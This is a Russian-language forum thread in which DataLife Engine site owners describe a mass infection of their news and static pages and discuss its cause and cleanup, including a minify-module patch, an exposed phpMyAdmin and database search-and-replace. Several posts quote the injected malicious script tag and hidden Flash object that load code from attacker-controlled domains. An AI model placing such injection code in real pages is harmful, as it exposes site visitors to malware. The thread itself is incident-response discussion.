Перейти к публикации

C 6 сентября все страницы оказались с java-скриптом


Рекомендованные сообщения

Всем привет, в общем такая бяка, все новостные а также статические страницы оказались с вредоностным кодом, каким образом он залетел ума не приложу.

Сайт уже 2-ой, год никаких именений не проводилось, Видимо какая то новая брешь в движке. Вирусня судя по зарегистрированным доменам вот-вот вышла на просторы.

Вот сам скрипт :

<script async="async" type="text/javascript" src="http://9yermfnl0i.ru/6516413452e79f3f415bd25c5c37cd19.js?in"></script>

Прописался в конце кода.

Просьба разобраться, а то оказался во всех черных списках браузеров.

Спасибо.

Версия DataLife Engine: 10.0 Тип лицензии скрипта: Лицензия активирована Операционная система: FreeBSD 8.3-RELEASE-p3 Версия PHP: 5.2.17 Версия MySQL: 5.1.63-log MySQLi Информация о GD: GD Version: bundled (2.0.34 compatible), FreeType Support: Enabled, FreeType Linkage: with freetype, T1Lib Support: Enabled, GIF Read Support: Enabled, GIF Create Support: Enabled, JPG Support: Enabled, PNG Support: Enabled, WBMP Support: Enabled, XPM Support: Disabled, XBM Support: Enabled, JIS-mapped Japanese Font Support: Disabled, Module mod_rewrite Неопределено Безопасный режим: Выключен Выделено оперативной памяти: 128M Отключенные функции: Неопределено Максимальный размер загружаемого файла: 32 Mb Размер свободного места на диске: 90,78 Gb

Ссылка на сообщение
Поделиться на других сайтах

Всем привет, в общем такая бяка, все новостные а также статические страницы оказались с вредоностным кодом, каким образом он залетел ума не приложу.

Это делалось не через скрипт, а злоумышленник имел прямой доступ к вашей БД, минуя DLE. Добавить JS в новость, через DLE невозможно в принципе. Ищите брешь в безопасности серверного ПО.

Чтобы удалить весь JS код из новостей, вам нужно в админпанели сделать перестроение публикаций, DLE автоматом удалит этот код, а из статических страниц удалять нужно уже вручную.

Ссылка на сообщение
Поделиться на других сайтах

Всем привет, в общем такая бяка, все новостные а также статические страницы оказались с вредоностным кодом, каким образом он залетел ума не приложу.

Это делалось не через скрипт, а злоумышленник имел прямой доступ к вашей БД, минуя DLE. Добавить JS в новость, через DLE невозможно в принципе. Ищите брешь в безопасности серверного ПО.

Чтобы удалить весь JS код из новостей, вам нужно в админпанели сделать перестроение публикаций, DLE автоматом удалит этот код, а из статических страниц удалять нужно уже вручную.

Как я правильно понял, это мне надо писать в саппорт хостниг-центра? БД у них крутится.

Спасибо за совет, в следующий раз воспользуюсь вашим способом, а то я удалил путем выгрузки таблицы новостей и статики, тупо через замену в блокноте. Движений конечно больше))

Ссылка на сообщение
Поделиться на других сайтах

Как я правильно понял, это мне надо писать в саппорт хостниг-центра? БД у них крутится.

Скорее всего вы получите стандартный ответ: "У нас все в порядке, ищите уязвимости в своих скриптах", этот ответ приходит от хостингов в 99,9% случаях, они не занимаются проблемами пользователей пока им явно не укажешь в чем например баг, если он таковой есть, потому как самое частное и основное это банальное воровство доступов с компьютера пользователя.

Я бы вам порекомендовал проверить и убедится в том что на вашем сайте нет посторонних скриптов, восстановить на всякий случай все файлы скрипта на оригинальные из архива дистрибутива. Сменить обязательно все пароли, в том числе и к БД и по FTP и вообще ко всему. Проверить свой комьютер на наличие вирусов и троянов, и не хранить доступы на своем комьютере, очень часто что их воруют именно с компьютера пользователя.

Ссылка на сообщение
Поделиться на других сайтах

Скорее всего вы получите стандартный ответ: "У нас все в порядке, ищите уязвимости в своих скриптах", этот ответ приходит от хостингов в 99,9% случаях, они не занимаются проблемами пользователей пока им явно не укажешь в чем например баг, если он таковой есть, потому как самое частное и основное это банальное воровство доступов с компьютера пользователя.

Я бы вам порекомендовал проверить и убедится в том что на вашем сайте нет посторонних скриптов, восстановить на всякий случай все файлы скрипта на оригинальные из архива дистрибутива. Сменить обязательно все пароли, в том числе и к БД и по FTP и вообще ко всему. Проверить свой комьютер на наличие вирусов и троянов, и не хранить доступы на своем комьютере, очень часто что их воруют именно с компьютера пользователя.

Такой ответ я и получил))) Порекомендовали тоже самое что и Вы. Вирусов однозначно нет, т.к. за этим делом слежу. Хорошо буду разбиратся. Просто на самом деле смутили именно регистрация вирусных доменов и время атаки, они совпадают, я и предположил что это массовая атака. Сомневаюсь что кто-то ради моего сайта затеял подобную атаку.

Огоромное спасибо за развернутый ответ.

Изменено пользователем Stepller
Ссылка на сообщение
Поделиться на других сайтах

Аналогично. Были заражены 2 сайта таким же вирусом, Гугл и Яндекс забанили моментально, что помогло сразу пресечь распространение. Сервер собственный, была оплачена услуга по выявлению проблемы и поиска бреши, результат нулевой - с сервером и его безопасностью все в порядке. Еще забавное совпадение, на сервере 11 сайтов и заражены были только два из них, которые имели ДЛЕ 10 версии.

Ссылка на сообщение
Поделиться на других сайтах

9,8 тоже такая беда более ранние версии не тронуты....

так что это массово сделано было.... и главное следов ни каких ни где :) .....

Ссылка на сообщение
Поделиться на других сайтах

Аналогично DLE 9.8 сейчас думаю заменить все на дефолтные файлы и сделать чистку может и поможет.

Нужна оригинальная dle 9.8 а то у меня лицензия кончилась на ней и еще не продлял

Ссылка на сообщение
Поделиться на других сайтах

Ну значит проблема не в бреши безопасности ПО. У меня модификаций на DLE вообще нет, кроме форума LB, это я про то надо ли заменять на дефолтные файлы сайта. Как я понимаю это была единичная акция по заражению - подготовке наших сайтов к атаке)

Ссылка на сообщение
Поделиться на других сайтах

у меня на 9.8 без каких либо модификаций и изменений.... +еще вижу у некоторых такая же шляпа....

Ссылка на сообщение
Поделиться на других сайтах

У всех у кого именно такая проблема как описано выше, то это прямой доступ к БД, минуя DLE.

Во первых смотрите, стоял ли у вас у всех патч http://dle-news.ru/b...ule-minify.html ? Эта проблема в теории может прочитать данные доступа к БД, работает далеко не везде, плюс нужен как минимум доступ к управлению БД, например к phpMyAdmin минуя панели авторизации хостинга, или например вы использовали одинаковые пароли что для хостинга, что для БД. Патч ставить нужно в любом случае обязательно независимо ни от чего.

Если патч уже стоял, то проблема в украденных другим способом доступа к БД.

Ссылка на сообщение
Поделиться на других сайтах

ну хз хз у меня пароли везде разные... одинаковых нет... с компа украсть не реально.. потому как их тоже там нет...

Ссылка на сообщение
Поделиться на других сайтах

ну хз хз у меня пароли везде разные... одинаковых нет... с компа украсть не реально.. потому как их тоже там нет...

так что это массово сделано было.... и главное следов ни каких ни где .....

Это один прямой запрос в БД, весь вопрос только в том откуда он был сделан. Следы есть всегда, главное знать где искать. Итак патч у вас стоял или нет, вы не ответили? У вас есть доступ к логам кто заходил в phpMyAdmin на сервере, если есть посмотрите было ли обращение к нему со сторонних IP адресов.

Дополнено: что касается вашего сайта у вас вообще беда полная, у вас phpMyAdmin в открытом доступе по адресу https://вашсайт.ru/myadmin/ плюс стоит старая уязвимая версия, вам вообще шелл можно заливать и взламывать без проблем, даже не зная паролей. Обновляйте незамедлительно, закрывайте и меняйте путь к нему.

Ссылка на сообщение
Поделиться на других сайтах

ну хз хз у меня пароли везде разные... одинаковых нет... с компа украсть не реально.. потому как их тоже там нет...

так что это массово сделано было.... и главное следов ни каких ни где .....

Это один прямой запрос в БД, весь вопрос только в том откуда он был сделан. Следы есть всегда, главное знать где искать. Итак патч у вас стоял или нет, вы не ответили? У вас есть доступ к логам кто заходил в phpMyAdmin на сервере, если есть посмотрите было ли обращение к нему со сторонних IP адресов.

Дополнено: что касается вашего сайта у вас вообще беда полная, у вас phpMyAdmin в открытом доступе по адресу https://вашсайт.ru/myadmin/ плюс стоит старая уязвимая версия, вам вообще шелл можно заливать и взламывать без проблем, даже не зная паролей. Обновляйте незамедлительно, закрывайте и меняйте путь к нему.

нет патч не стоял... я не видел его...и не увидел бы если сегодня не показали :)

Ссылка на сообщение
Поделиться на других сайтах

zimka,

Тогда это может быть причиной вашей проблемы, с учетом открытого входа в phpMyAdmin.

Ссылка на сообщение
Поделиться на других сайтах

Данные от БД были угнаны именно из dbconfig.php.

У меня подобная проблема была (фикс не стоял), так в папке enginecachesystem были обнаружены два файла с идентичным содержанием данных из dbconfig.php

я их удалил, поставил фикс, поменял пароли, пока всё тихо

PS. у человека не поставившего фикс или не поменявшего пароли от БД (не знаю что точно), был повторно внедрён код БД новостей и статестических страниц только уже не много друго содержания

Изменено пользователем wladimirdead
Ссылка на сообщение
Поделиться на других сайтах

Подскажите запрос в mysql чтобы вычистить все это добро.

Нашел такое:


UPDATE имя базы

SET name = REPLACE(name, ' ', '-')

Что писать в имя базы, чтобы вырезать все?

Ссылка на сообщение
Поделиться на других сайтах

да , мне тоже заражали сайт.

Вопрос был решён путём замены пароли хостинга на 20 и значный, проблема ушла.

А ещё лучше смс - авторизация хостинга. тогда сайт защищён.

Спасибки за скрипт, надо закинуть нужным людям :)

Ссылка на сообщение
Поделиться на других сайтах

rifler,

Не нужно делать запросов, зайдите в админпанели в раздел "Перестроение публикаций" и сделайте в нем перестроение новостей. DLE сам удалит скрипты из новостей.

Ссылка на сообщение
Поделиться на других сайтах

Здравствуйте. Также во всех новостях вчера появился код:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?704497470" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?106593817" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>[/CODE]

В конце также стоял js, его убрал с помощью перестроений (спасибо админам за чудесный совет), а вот object classid через поиск и замену..

Да, я пропустил это обновление: http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

Сейчас и на др. сайте поменять нужно.

Так что исправляйте народ, благо делается это быстро :)

Ссылка на сообщение
Поделиться на других сайтах

кхм. поиск и замена удаляет не всё :angry:


1. <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?63115695" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?380838547" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>



2. <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?1223934431......

кто вкурсе, как это быстро всё убрать? а то 11к новостей устану перебирать

Изменено пользователем mmmmm1501
Ссылка на сообщение
Поделиться на других сайтах

Добрый день! Та же самая фигня с вирусом уже неделю с ней занимаюсь. версия ДЛЕ 9.6... Сейчас попробовал ваш совет... Кстати проверил встроенным типа антивирусником от дле который определяет инородные файлы...

Вот что определяет антивирусная программа

Jiangmin Trojan/AndroidOS.afcr

Это с админки прилагается...

Обнаружены следующие подозрительные файлы: Имя файла: Размер: Дата:

./backup/backup/.htaccess 31 b 30.05.2013 11:18:43 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/config.php 758 b 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/rpc.php 2,94 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/utils/Logger.php 5,6 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/utils/JSON.php 11,6 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php 2,88 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php 1,93 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/SpellChecker.php 1,51 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php 3,15 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php 1,67 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву ./engine/editor/jscripts/tiny_mce/plugins/spellchecker/includes/general.php 2,23 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву

./engine/editor/jscripts/tiny_mce/plugins/typograf/typographus.php 13,34 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву

./engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php 1,75 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву

./engine/editor/jscripts/tiny_mce/plugins/emotions/emotions.php 2,25 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву

./engine/editor/jscripts/tiny_mce/tiny_mce_gzip.php 10,28 Kb 30.05.2013 11:18:44 неизвестен дистрибутиву

./engine/modules/imagepreview.php 2,48 Kb 30.05.2013 11:18:46 неизвестен дистрибутиву

./engine/images.php 3,59 Kb 30.05.2013 11:18:43 неизвестен дистрибутиву

./language/language/.htaccess 33 b 30.05.2013 11:18:47 неизвестен дистрибутиву

./phpinfo.php 20 b 30.05.2013 11:18:43 неизвестен дистрибутиву

Я так подозреваю, что там идет задвоение некоторых файлов и папок... Но может это не так...

PS/ Все обновления скрипта по безопасности были сделаны своевременно... Последнее обновление установил сегодня, как только увидел его в админке.

Изменено пользователем RedBaron
Ссылка на сообщение
Поделиться на других сайтах

mmmmm1501,

Jiihuda,

В данном случае нужно сделать бекап БД, открыть его в любом текстовом редакторе, например Notepad++ и провести поиск и замену в нем, в бекапе формат немного отличается, поэтому найдите сначала нужный код например по домену.

Я так подозреваю, что там идет задвоение некоторых файлов и папок... Но может это не так...

Часть файлов у вас от старых версий скрипта, часть от некорректного копирования файлов дистрибутива. Все что говорит антивирус можно удалить.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...